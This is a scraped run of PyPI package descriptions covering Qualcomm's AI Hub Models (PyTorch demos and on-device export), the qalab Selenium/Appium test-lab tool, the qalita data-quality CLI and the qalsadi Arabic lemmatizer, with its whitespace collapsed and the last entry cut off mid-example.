Demo with PyTorchAll modelscontain CLI demos that run the model inPyTorchlocally with sample input. Demos are optimized for code clarity\nrather than latency, and run exclusively in PyTorch. Optimal model latency can\nbe achieved with model export viaQualcomm\u00ae AI\nHub.python-mqai_hub_models.models.yolov7.demoFor additional details on how to use the demo CLI, use the--helpoptionpython-mqai_hub_models.models.yolov7.demo--helpSee themodel directorybelow to explore all other models.Note that most ML use cases require some pre and post-processing that are not\npart of the model itself. A python reference implementation of this is provided\nfor each model inapp.py. Apps load & pre-process model input, run model\ninference, and post-process model output before returning it to you.Here is an example of how the PyTorch CLI works forYOLOv7:fromPILimportImagefromqai_hub_models.models.yolov7importModelasYOLOv7Modelfromqai_hub_models.models.yolov7importAppasYOLOv7Appfromqai_hub_models.utils.asset_loadersimportload_imagefromqai_hub_models.models.yolov7.demoimportIMAGE_ADDRESS# Load pre-trained modeltorch_model=YOLOv7Model.from_pretrained()# Load a simple PyTorch based applicationapp=YOLOv7App(torch_model)image=load_image(IMAGE_ADDRESS,\"yolov7\")# Perform prediction on a sample imagepred_image=app.predict(image)[0]Image.fromarray(pred_image).show()CLI demo to run on hosted Qualcomm\u00ae devicesSome modelscontain CLI demos that run the model on a hosted\nQualcomm\u00ae device usingQualcomm\u00ae AI Hub.To run the model on a hosted device,sign up for access to Qualcomm\u00ae AI\nHub. Sign-in to Qualcomm\u00ae AI Hub with your\nQualcomm\u00ae ID. Once signed in navigate to Account -> Settings -> API Token.With this API token, you can configure your client to run models on the cloud\nhosted devices.qai-hubconfigure--api_tokenAPI_TOKENNavigate todocsfor more information.The on-device CLI demo performs the following:Exports the model for on-device execution.Profiles the model on-device on a cloud hosted Qualcomm\u00ae device.Runs the model on-device on a cloud hosted Qualcomm\u00ae device and compares accuracy between a local CPU based PyTorch run and the on-device run.Downloads models (and other required assets) that can be deployed on-device in an Android application.python-mqai_hub_models.models.yolov7.exportMany models may have initialization parameters that allow loading custom\nweights and checkpoints. See--helpfor more detailspython-mqai_hub_models.models.yolov7.export--helpHow does this export script work?As described above, the script above compiles, optimizes, and runs the model on\na cloud hosted Qualcomm\u00ae device. The demo usesQualcomm\u00ae AI Hub's Python\nAPIs.Here is a simplified example of code that can be used to run the entire model\non a cloud hosted device:fromtypingimportTupleimporttorchimportqai_hubashubfromqai_hub_models.models.yolov7importModelasYOLOv7Model# Load YOLOv7 in PyTorchtorch_model=YOLOv7Model.from_pretrained()torch_model.eval()# Trace the PyTorch model using one data point of provided sample inputs to# torch tensor to trace the model.example_input=[torch.tensor(data[0])forname,dataintorch_model.sample_inputs().items()]pt_model=torch.jit.trace(torch_model,example_input)# Select a devicedevice=hub.Device(\"Samsung Galaxy S23\")# Compile model for a specific devicecompile_job=hub.submit_compile_job(model=pt_model,device=device,input_specs=torch_model.get_input_spec(),)# Get target model to run on a cloud hosted devicetarget_model=compile_job.get_target_model()# Profile the previously compiled model on a cloud hosted deviceprofile_job=hub.submit_profile_job(model=target_model,device=device,)# Perform on-device inference on a cloud hosted deviceinput_data=torch_model.sample_inputs()inference_job=hub.submit_inference_job(model=target_model,device=device,inputs=input_data,)# Returns the output as dict{name: numpy}on_device_output=inference_job.download_output_data()Working with source codeYou can clone the repository using:gitclonehttps://github.com/quic/ai-hub-models/blob/maincdmain\npipinstall-e.Install additional dependencies to prepare a model before using the following:cdmain\npipinstall-e\".[yolov7]\"All models have accuracy and end-to-end tests when applicable. These tests as\ndesigned to be run locally and verify that the PyTorch code produces correct\nresults. To run the tests for a model:python-mpytest--pyargsqai_hub_models.models.yolov7.testFor any issues, please contact us atai-hub-support@qti.qualcomm.com.Model DirectoryComputer VisionModelREADMETorch AppDevice ExportCLI DemoImage ClassificationMobileNet-v2-Quantizedqai_hub_models.models.mobilenet_v2_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fGoogLeNetqai_hub_models.models.googlenet\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNet50qai_hub_models.models.resnet50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSwin-Smallqai_hub_models.models.swin_small\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fInception-v3Quantizedqai_hub_models.models.inception_v3_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMobileNet-v3-Smallqai_hub_models.models.mobilenet_v3_small\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fGoogLeNetQuantizedqai_hub_models.models.googlenet_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fRegNetqai_hub_models.models.regnet\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNeXt50qai_hub_models.models.resnext50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fVITqai_hub_models.models.vit\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNet18Quantizedqai_hub_models.models.resnet18_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNet101qai_hub_models.models.resnet101\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNeXt101qai_hub_models.models.resnext101\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMobileNet-v2qai_hub_models.models.mobilenet_v2\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSqueezeNet-1_1qai_hub_models.models.squeezenet1_1\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSqueezeNet-1_1Quantizedqai_hub_models.models.squeezenet1_1_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fInception-v3qai_hub_models.models.inception_v3\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fWideResNet50qai_hub_models.models.wideresnet50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNet101Quantizedqai_hub_models.models.resnet101_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMNASNet05qai_hub_models.models.mnasnet05\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSwin-Baseqai_hub_models.models.swin_base\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDenseNet-121qai_hub_models.models.densenet121\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fShufflenet-v2Quantizedqai_hub_models.models.shufflenet_v2_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fShufflenet-v2qai_hub_models.models.shufflenet_v2\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNeXt101Quantizedqai_hub_models.models.resnext101_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fResNet18qai_hub_models.models.resnet18\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fEfficientNet-B0qai_hub_models.models.efficientnet_b0\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMobileNet-v3-Largeqai_hub_models.models.mobilenet_v3_large\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fWideResNet50-Quantizedqai_hub_models.models.wideresnet50_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fConvNext-Tinyqai_hub_models.models.convnext_tiny\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSwin-Tinyqai_hub_models.models.swin_tiny\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fImage EditingLaMa-Dilatedqai_hub_models.models.lama_dilated\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fImage GenerationStyleGAN2qai_hub_models.models.stylegan2\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSuper ResolutionQuickSRNetLargeqai_hub_models.models.quicksrnetlarge\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fESRGANqai_hub_models.models.esrgan\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fReal-ESRGAN-x4plusqai_hub_models.models.real_esrgan_x4plus\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fXLSR-Quantizedqai_hub_models.models.xlsr_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fQuickSRNetMediumqai_hub_models.models.quicksrnetmedium\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fReal-ESRGAN-General-x4v3qai_hub_models.models.real_esrgan_general_x4v3\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSESR-M5-Quantizedqai_hub_models.models.sesr_m5_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fQuickSRNetSmallqai_hub_models.models.quicksrnetsmall\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSESR-M5qai_hub_models.models.sesr_m5\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fXLSRqai_hub_models.models.xlsr\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSemantic SegmentationYolo-v8-Segmentationqai_hub_models.models.yolov8_seg\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSINetqai_hub_models.models.sinet\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fUnet-Segmentationqai_hub_models.models.unet_segmentation\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFCN_ResNet50qai_hub_models.models.fcn_resnet50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDDRNet23-Slimqai_hub_models.models.ddrnet23_slim\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFastSam-Sqai_hub_models.models.fastsam_s\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-122NS-LowResqai_hub_models.models.ffnet_122ns_lowres\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-78S-Quantizedqai_hub_models.models.ffnet_78s_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-40S-Quantizedqai_hub_models.models.ffnet_40s_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMediaPipe-Selfie-Segmentationqai_hub_models.models.mediapipe_selfie\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDeepLabV3-ResNet50qai_hub_models.models.deeplabv3_resnet50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFastSam-Xqai_hub_models.models.fastsam_x\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-54Sqai_hub_models.models.ffnet_54s\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-78S-LowResqai_hub_models.models.ffnet_78s_lowres\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSegment-Anything-Modelqai_hub_models.models.sam\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-78Sqai_hub_models.models.ffnet_78s\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-40Sqai_hub_models.models.ffnet_40s\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fFFNet-54S-Quantizedqai_hub_models.models.ffnet_54s_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fObject DetectionMediaPipe-Hand-Detectionqai_hub_models.models.mediapipe_hand\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDETR-ResNet50-DC5qai_hub_models.models.detr_resnet50_dc5\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDETR-ResNet101-DC5qai_hub_models.models.detr_resnet101_dc5\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fYolo-v8-Detectionqai_hub_models.models.yolov8_det\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDETR-ResNet101qai_hub_models.models.detr_resnet101\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fDETR-ResNet50qai_hub_models.models.detr_resnet50\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fYolo-v7qai_hub_models.models.yolov7\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fYolo-v6qai_hub_models.models.yolov6\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMediaPipe-Face-Detectionqai_hub_models.models.mediapipe_face\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fPose EstimationHRNetPoseQuantizedqai_hub_models.models.hrnet_pose_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMediaPipe-Pose-Estimationqai_hub_models.models.mediapipe_pose\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fLiteHRNetqai_hub_models.models.litehrnet\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fHRNetPoseqai_hub_models.models.hrnet_pose\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fOpenPoseqai_hub_models.models.openpose\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fAudioModelREADMETorch AppDevice ExportCLI DemoSpeech RecognitionWhisper-Baseqai_hub_models.models.whisper_asr\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fHuggingFace-WavLM-Base-Plusqai_hub_models.models.huggingface_wavlm_base_plus\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fAudio EnhancementFacebook-Denoiserqai_hub_models.models.facebook_denoiser\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fMultimodalModelREADMETorch AppDevice ExportCLI DemoTrOCRqai_hub_models.models.trocr\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fOpenAI-Clipqai_hub_models.models.openai_clip\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fGenerative AiModelREADMETorch AppDevice ExportCLI DemoImage GenerationStable-Diffusionqai_hub_models.models.stable_diffusion_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fControlNetqai_hub_models.models.controlnet_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fText GenerationLlama-v2-7B-Chatqai_hub_models.models.llama_v2_7b_chat_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fBaichuan-7Bqai_hub_models.models.baichuan_7b_quantized\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f"} +{"package": "qa-keys-test", "pacakge-description": "No description available on PyPI."} +{"package": "qal", "pacakge-description": "QAL is a Python library for mixing and merging data involving different sources and destinations.It supports several database backends and file formats."} +{"package": "qalab", "pacakge-description": "No description available on PyPI."} +{"package": "qalaboratory", "pacakge-description": "Branch nameQAlabQAcodeQAdminQAdocQAtestlinkmasterHow to install ?Clone this repo:git clonehttps://github.com/netzulo/qalab.gitEnter on repo directory:cd qalabClone submodules:git submodule update--init--recursiveAttach branches HEAD:git submodule foreach git checkout masterInstall qalab package: from PIPpip install qalaboratoryor from setup.py filepython setup.py installCommand Usageusage: qaenv.py [-h] [-v] [-sd SERVER_DRIVER] [-m MODE] [-i] [-s]\n [-p PLATFORM] [-dcp DRIVER_CONFIG_PATH]\n\nPerforms selenium drivers operations\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --verbose verbose level... repeat up to three times.\n -sd SERVER_DRIVER, --server_driver SERVER_DRIVER\n Select server driver, values are:\n [selenium,appium,selendroid]\n -m MODE, --mode MODE Select mode, values are: [hub, node]\n -i, --install Download driver server jar\n -s, --start Start driver server jar\n -p PLATFORM, --platform PLATFORM\n Select mode, values are: [lin32,lin64,win32,win64]\n -dcp DRIVER_CONFIG_PATH, --driver_config_path DRIVER_CONFIG_PATH\n Use different absolute PATH+FILE_NAME to read\n DRIVER_CONFIG\n\n----- help us on , https://github.com/netzulo/qalab -------How to create HUB + Node ?HubCreate configuration :python qalab/qaenv.py--server_driverselenium--modehub--installStart Hub :python qalab/qaenv.py--server_driverselenium--modehub--startNodeCreate configuration :python qalab/qaenv.py--server_driverselenium--modenode--installStart Node :python qalab/qaenv.py selenium--server_driverselenium--modenode--start--platformwin64AppiumMust be installed SDK and appium (from NPM) as global packageInstall SDKInstall appium:npm install-gappiumCreate configuration :python qalab/qaenv.py--server_driverappium--modenode--installStart Node :python qalab/qaenv.py--server_driverappium--modenode--start--platformwin64Env nameEnv descriptionpy27,py34,py35,py36Python supported versionsdocsGenerate doc HTML in /docsflake8Exec linter in qalab/ tests/selenium-hubStart intalled selenium hubselenium-nodeStart intalled selenium nodeselendroid-hubStart intalled selendroid hubselendroid-nodeStart intalled selendroid nodeappium-nodeStart intalled appium nodeHow to exec tests ?Tests from setup.py file :python setup.py testInstall from PIP file :pip install toxTests from tox :tox-l&& tox-eTOX_ENV_NAME(see tox.ini file to get environment names)TOX Env nameEnv descriptionpy27,py34,py35,py36Python supported versionsflake8Exec linter in qalab/ tests/coverageGenerate XML and HTML reportsdocsGenerate doc HTML in /docsselenium-hubStart intalled selenium hubselenium-nodeStart intalled selenium nodeselendroid-hubStart intalled selendroid hubselendroid-nodeStart intalled selendroid nodeappium-nodeStart intalled appium nodeselenium-testsExecute Hub+Node testsQADriversDriversLinux 32Linux 64Windows 32Windows 64ChromeOKOKOKOKFirefoxOKOKOKOKPhantomJsOKOKOKOKInternet ExplorerOKOKEdgeOKOKAndroidOKOKOKOK"} +{"package": "qalgebra", "pacakge-description": "QAlgebraPython package for symbolic quantum algebra.Development of QAlgebra happens onGithub. You can read the full documentationonline.InstallationTo install the latest released version of QAlgebra, run this command in your terminal:pip install qalgebraThis is the preferred method to install QAlgebra, as it will always install the most recent stable release.If you don't havepipinstalled, thePython installation guide, respectively thePython Packaging User Guidecan guide you through the process.To install the latest development version of QAlgebra fromGithub.pip install git+https://github.com/qalgebra/qalgebra.git@master#egg=qalgebraUsageTo use QAlgebra in a project:import qalgebraHistory0.2.0 (2020-12-30)Initial alpha release0.1.0 (2018-12-06)Placeholder release"} +{"package": "qa-lib-factories", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qalioss", "pacakge-description": "No description available on PyPI."} +{"package": "qalita", "pacakge-description": "QALITA Command Line Interface (CLI)QALITA Command Line Interface (CLI) is a tool intended to be used by Data Engineers who setup's QALITA Platform's agents, sources and assets.It gives easy to use command to help them make an up & running qalita platform's environment in no time.QALITA Command Line Interface (CLI)Quick StartInstallationUsageSetupMinimal ConfigConnected ConfigMake an .env file and export ENV Values:qalita agentqalita agent loginqalita agent runJobWorkerqalita agent joblistqalita agent infoqalita packqalita pack initqalita pack listqalita pack runqalita pack validateqalita pack pushqalita sourceqalita source addqalita source validateqalita source listqalita source pushHow to 'Pack' ?InitAt runtimePost runtimeQuick StartInstallationAs simple as :pipinstallqalitaor there is aDocker Imageavailable at :UsageIf you want to have more detailed and contextual help, typeqalita COMMAND -hUsage:qalita[OPTIONS]COMMAND[ARGS]...QALITACommandLineInterfaceSetupThis CLI command communicates with the QALITA Platform API backend.There are several layers of configuration depending of your needs :Minimal ConfigQALITA_AGENT_NAME=The agent will help you identify it in the frontend interface, there are no restrictions on the name.QALITA_AGENT_MODE=The mode of the agent :Job: In job mode, when you use the commandqalita agent run, it will immediately try to run a job on the local current context.Worker: In worker mode, when you use the commandqalita agent runit will wait for the backend to gives him jobs to run. It is simmilar to a scheduler.Note that the commandqalita agent runneeds more configuration to run correctly, it will displays error otherwise.Connected ConfigQALITA_AGENT_ENDPOINT=Example :http://localhost:3080/api/v1The agent url endpoint gives the ability for the agent to communicate with the qalita's platform endpoints, it enables :* Listing packs\n* Running Jobs\n* Publishing sources\n* Publishing packsQALITA_AGENT_TOKEN=The token is provided while doing the quickstart steps in the frontend app. It is associated with your user and your role.Note that you need to have at least the[Data Engineer]role to use the QALITA CLIMake an .env file and export ENV Values:You can alternatively make an .env file and export the values to your environment..env-localQALITA_AGENT_NAME=QALITA_AGENT_MODE=QALITA_AGENT_ENDPOINT=https://api.company.com/api/v1QALITA_AGENT_TOKEN=QALITA_PACK_NAME=Then export the values of the file to ENV values with :export$(xargs<.env-local)qalita agentTheqalita agentcommand allow you to :Register an agent to the platformGet information about your local agentRun a pack on a sourceList agent jobs (past & future)qalita agent loginParameters :name: the name of the agentmode: the mode of the agent token: the api token you get from the platformurl: the backend api url of the platformqalita agent loginregisters your local agent to the platform, it enables you to run jobs, or create routines (schedules) to run pack programmaticaly.You need to have configured your agent with :\n\n* QALITA_AGENT_ENDPOINT=\n* QALITA_AGENT_TOKEN=You can get your token from the frontend or with an OAUTH2 API call to the /users/signin backend's endpointMore info on your frontend documentation, and on theConnected configof the docqalita agent runParameters :--name: the name of the agent--mode: the mode of the agent --token: the api token you get from the platform--url: the backend api url of the platformSpecific parameters injobmode :--source: the source id you want to run your job against--source-version(optional) : the source version, by default it will run to the latest soruce version--pack: the pack id you want to run your job against--pack-version(optional) : the pack version, by default it will run the latest version of the packqalitaagentrunruns in different mode :JobThe agent will run given configuration-p: a pack_id given with theqalita pack list, note that your pack needs to be pushed to the platform in order to have an id.-s: a source_id given with theqalita source list, note that your source needs to be pushed to the platform in order to have an id.WorkerThe agent will wait until it receives an order from the frontend, it will then worke as same as in job mode.Note that this mode will run indefinitelyqalita agent joblistParameters :--name: the name of the agent--mode: the mode of the agent --token: the api token you get from the platform--url: the backend api url of the platformList jobs from the platform backend.qalita agent infoParameters :--name: the name of the agent--mode: the mode of the agent --token: the api token you get from the platform--url: the backend api url of the platformGet infos about your local agent configuration.qalita packTheqalita packcommand allow you to :Initialize a new packList all available packsValidate itRun a local packPush your pack version to the platformqalita pack initParameters :--name: the name of the packInitialize a new pack, you need to have set aname, it will create a newfolderwith the name of the pack.You can set your name by passing a new parameters to the commandline or setting a new environment variable :QALITA_PACK_NAME=.Here is the arborescence created :./_pack/\n /run.sh # Entrypoint file that will be run with qalita agent run\n /README.md # Documentation file\n /properties.yaml # Properties file that contains properties about the pack\n /main.py # (pack specific) The main script (you can run your pack with whatever langage you choose)\n /config.json # (pack specific) The config file of your pack, you can use it to set any configurations you like.\n /requirements.txt # (pack specific) The requirements file that is run inside the run.shqalita pack listParameters :You need to have logged in withqalita agent loginList all the packs that are accessible to you with the Qalita Platform.qalita pack runParameters :--name: Pack nameRun your locally configured packqalita pack validateParameters :--name: Pack nameValidate your locally configured packqalita pack pushParameters :--name: Pack namePush your locally configured packqalita sourceTheqalita sourcecommand allow you to :Add a new source to your local configurationList your local sources from yourqalita-conf.ymlfilePush your local sources from yourqalita-conf.ymlfileValidate your conf fileqalita-conf.ymlNote , by default theqalita-conf.ymlfile is stored to~/.qalita/qalita-conf.yml, setQALITA_HOMEenv to customize the default path.qalita source addThis function will help you add a new source to your configuration fileqalita-conf.yamlThis command doesn't have parameters, you need to follow command prompts.Prompt 1: Source namePrompt 2: Source typePrompt 3: Is conditionnal, depends on the source type.Case : Source Type =file: Source pathCase : Source Type =database: host / port / username / password / databasePrompt 4: Source descriptionPrompt 5: Is the source a reference ? [bool] (default : false)Prompt 6: Is the source sensistive ? [bool] (default : false)Prompt 7: Visibility of the source (private, internal, public) (default : private)At the end of the prompt, the cli will check reachability of the source depending of theconfigurationandtype, this step is calledvalidate_sourceto complete the process of registering a new source to the platform, you need to push your source with the command :qalita source pushqalita source validateHelper function to help you add a new source to your configuration fileqalita-conf.yamlqalita source listParameters :You need to have aqalita-conf.yamlfile that contains your sources configuration.Exemple :version:1sources:-config:path:/home/user/data_dirdescription:Folder containing csv filesname:my_csv_filesowner:userreference:falsevisibility:privatesensitive:falsetype:fileIn this exemple we have :General keysKeyTypeDescriptionversionintThe version of the configurationsourceslistThe list of sourcesSource keysKeyTypeDescriptionnamestringThe name of the sourcedescriptionstringThe description of the sourceownerstringThe owner of the sourcetypestringThe type of the sourceconfigdictThe configuration of the sourcevisibilitystringThe visibility of the source referenceboolIs the source a reference sourcesensitiveboolIs the source containing sensitive dataqalita source pushRegisters your sources to the platformNote: If you want to run a pack on your source, you will first need to push your source to the platform. It will give you a source_id with which you can run your pack.How to 'Pack' ?A pack is an entity run by the agent, it can be created by anyone.It's purpose is to process the source and retrieve usefull informations about it to feed back into the platform.InitTo create the base pack, see :qalita pack init.At runtimeThe entrypoint of the pack is therun.shfile that is located at theroot pathof the temp local folder created by the agent.run.shExample :#/bin/bashpython-mpipinstall--quiet-rrequirements.txtpythonmain.pyThe pack is feed by asource_conf.jsonfile containing the source'sconfig:data. This file is located alongside therun.shentrypoint.source_conf.jsonExample :{\"config\":{\"path\":\"/home/lucas/desktop\"},\"description\":\"Desktop files\",\"id\":1,\"name\":\"local_data\",\"owner\":\"lucas\",\"type\":\"file\",\"reference\":false,\"sensitive\":false,\"visibility\":\"private\",\"validate\":\"valid\"}Note : The pack is responsible for managing itself it'ssource typecompatibility by checking the sourcetypein thesource_conf.jsonfile.Post runtimeA the end of the pack run, the agent searchs for :logs.txt: File uploaded to give feedback logs to the platform in the frontend.logs.txtExample :2023-07-21 11:51:12,688 - qalita.commands.pack - INFO - ------------- Pack Run -------------\n2023-07-21 11:51:15,087 - qalita.commands.pack - INFO - CSV files found:\n2023-07-21 11:51:15,222 - qalita.commands.pack - ERROR - Summarize dataset: 0%| | 0/5 [00:00\",\"scope\":\"\",\"content\":\"\"},{...}...]}metrics.jsonMetrics file contains the metrics given by the pack about the source.metrics.jsonExample :{[{\"scope\":\"\",\"key\":\"\",\"value\":\"\"},{...}...]}Metrics & recommendations are pushed to the platform and are then available to the source's pack run view."} +{"package": "qalita_core", "pacakge-description": "No description available on PyPI."} +{"package": "qalsadi", "pacakge-description": "Qalsadi Arabic Morphological Analyzer and Lemmatizer for PythonDeveloppers: Taha Zerrouki:http://tahadz.comtaha dot zerrouki at gmail dot comFeaturesvalueAuthorsAuthors.mdRelease0.5LicenseGPLTrackerlinuxscout/qalsadi/IssuesWebsitehttps://pypi.python.org/pypi/qalsadiDocpackage DocumentaionSourceGithubDownloadsourceforgeFeedbacksCommentsAccounts@Twitter@SourceforgeCitationIf you would cite it in academic work, can you use this citationT. Zerrouki\u200f, Qalsadi, Arabic mophological analyzer Library for python., https://pypi.python.org/pypi/qalsadi/Another Citation:Zerrouki, Taha. \"Towards An Open Platform For Arabic Language Processing.\" (2020).or in bibtex format@misc{zerrouki2012qalsadi,title={qalsadi, Arabic mophological analyzer Library for python.},author={Zerrouki, Taha},url={https://pypi.python.org/pypi/qalsadi},year={2012}}```bibtex@thesis{zerrouki2020towards,title={Towards An Open Platform For Arabic Language Processing},author={Zerrouki, Taha},year={2020}}Features \u0645\u0632\u0627\u064a\u0627LemmatizationVocalized Text Analyzer,Use Qutrub library to analyze verbs.give word frequency in Arabic modern use.ApplicationsStemming textsText Classification and categorizationSentiment AnalysisNamed Entities RecognitionInstallationpip install qalsadiRequirementspip install -r requirements.txtUsageDemoThe demo is available onTahadz.com>Tools/\u064eAnalysis \u0642\u0633\u0645 \u0623\u062f\u0648\u0627\u062a - \u062a\u062d\u0644\u064a\u0644ExampleLemmatization>>>importqalsadi.lemmatizer>>>text=u\"\"\"\u0647\u0644 \u062a\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u062a\u0631\u062c\u0645\u0629 \u0643\u064a \u062a\u0641\u0647\u0645 \u062e\u0637\u0627\u0628 \u0627\u0644\u0645\u0644\u0643\u061f \u0627\u0644\u0644\u063a\u0629 \"\u0627\u0644\u0643\u0644\u0627\u0633\u064a\u0643\u064a\u0629\" (\u0627\u0644\u0641\u0635\u062d\u0649) \u0645\u0648\u062c\u0648\u062f\u0629 \u0641\u064a \u0643\u0644 \u0627\u0644\u0644\u063a\u0627\u062a \u0648\u0643\u0630\u0644\u0643 \u0627\u0644\u0644\u063a\u0629 \"\u0627\u0644\u062f\u0627\u0631\u062c\u0629\" .. \u0627\u0644\u0641\u0631\u0646\u0633\u064a\u0629 \u0627\u0644\u062a\u064a \u0646\u062f\u0631\u0633 \u0641\u064a \u0627\u0644\u0645\u062f\u0631\u0633\u0629 \u0644\u064a\u0633\u062a \u0627\u0644\u0641\u0631\u0646\u0633\u064a\u0629 \u0627\u0644\u062a\u064a \u064a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 \u0627\u0644\u0646\u0627\u0633 \u0641\u064a \u0634\u0648\u0627\u0631\u0639 \u0628\u0627\u0631\u064a\u0633 .. \u0648\u0645\u0644\u0643\u0629 \u0628\u0631\u064a\u0637\u0627\u0646\u064a\u0627 \u0644\u0627 \u062a\u062e\u0637\u0628 \u0628\u0644\u063a\u0629 \u0634\u0648\u0627\u0631\u0639 \u0644\u0646\u062f\u0646 .. \u0644\u0643\u0644 \u0645\u0642\u0627\u0645 \u0645\u0642\u0627\u0644\"\"\">>>lemmer=qalsadi.lemmatizer.Lemmatizer()>>># lemmatize a word...lemmer.lemmatize(\"\u064a\u062d\u062a\u0627\u062c\")'\u0627\u062d\u062a\u0627\u062c'>>># lemmatize a word with a specific pos>>>lemmer.lemmatize(\"\u0648\u0641\u064a\")'\u0641\u064a'>>>lemmer.lemmatize(\"\u0648\u0641\u064a\",pos=\"v\")'\u0648\u0641\u0649'>>>lemmas=lemmer.lemmatize_text(text)>>>print(lemmas)['\u0647\u0644','\u0627\u062d\u062a\u0627\u062c','\u0625\u0644\u0649','\u062a\u0631\u062c\u0645\u0629','\u0643\u064a','\u062a\u0641\u0647\u0645','\u062e\u0637\u0627\u0628','\u0645\u0644\u0643','\u061f','\u0644\u063a\u0629','\"','\u0643\u0644\u0627\u0633\u064a\u0643\u064a','\"(','\u0641\u0635\u062d\u0649',')','\u0645\u0648\u062c\u0648\u062f','\u0641\u064a','\u0643\u0644','\u0644\u063a\u0629','\u0630\u0644\u0643','\u0644\u063a\u0629','\"','\u062f\u0627\u0631\u062c','\"..','\u0641\u0631\u0646\u0633\u064a','\u0627\u0644\u062a\u064a','\u062f\u0631\u0633','\u0641\u064a','\u0645\u062f\u0631\u0633\u0629','\u0644\u064a\u0633\u062a','\u0641\u0631\u0646\u0633\u064a','\u0627\u0644\u062a\u064a','\u0627\u0633\u062a\u062e\u062f\u0645','\u0646\u0627\u0633','\u0641\u064a','\u0634\u0648\u0627\u0631\u0639','\u0628\u0627\u0631\u064a\u0633','..','\u0645\u0644\u0643','\u0628\u0631\u064a\u0637\u0627\u0646\u064a\u0627','\u0644\u0627','\u062e\u0637\u0628','\u0628\u0644\u063a\u0629','\u0634\u0648\u0627\u0631\u0639','\u062f\u0646\u0648','..','\u0643\u0644','\u0645\u0642\u0627\u0645','\u0645\u0642\u0627\u0644\u064a']>>># lemmatize a text and return lemma 